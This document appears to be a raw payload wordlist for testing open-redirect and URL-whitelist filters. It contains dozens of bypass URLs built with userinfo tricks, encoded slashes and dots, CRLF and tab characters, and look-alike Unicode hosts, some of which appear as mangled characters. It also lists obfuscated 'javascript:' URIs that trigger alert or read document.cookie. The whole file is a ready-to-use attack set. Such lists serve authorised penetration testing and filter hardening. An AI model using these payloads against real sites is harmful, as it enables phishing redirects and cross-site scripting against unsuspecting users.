https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///whitelisted.com@google.com/%2e%2e
https:///whitelisted.com@google.com/%2f%2e%2e
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://%09/google.com
https://%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/whitelisted.com@google.com
https://%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dgoogle.com
https://%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cgoogle.com
https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cwhitelisted.com@google.com
https://%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://evil.câ„€.example.com
https://google.com
HtTPs://google.com
https://google.com?whitelisted.com
https://google.com/
https://google.com//
https://google.com/%2e%2e%2f
https://google.com/%2f..
https://google.com/%2f%2e%2e
https://google.com/whitelisted.com
https://google.com\whitelisted.com
https://google.com#whitelisted.com
https://google%E3%80%82com
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
https://whitelisted.com;@google.com
https://whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://whitelisted.com.google.com
https://whitelisted.com@google.com
https://whitelisted.com@google.com/
https://whitelisted.com@google.com//
https://whitelisted.com@google.com/%2e%2e%2f
https://whitelisted.com@google.com/%2f..
https://whitelisted.com@google.com/%2f%2e%2e
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://whitelisted.com/https://google.com/
https://whitelisted.com/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.test.com.test
https:/\google.com
https:/%5cgoogle.com/
https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:www.google.com
https%3a%2f%2fgoogle.com%2f
https%3A%2F%2Fwww.google.com
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript://whitelisted.com?%a0alert%281%29
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript:alert(1)
javascript:alert(1);
javascript:confirm(1)
javascript:prompt(1)
â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
whitelisted.com;@google.com
whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
whitelisted.com.google.com
whitelisted.com@%E2%80%AE@google.com
www.www.test.com.evil.com
x00http://google.com
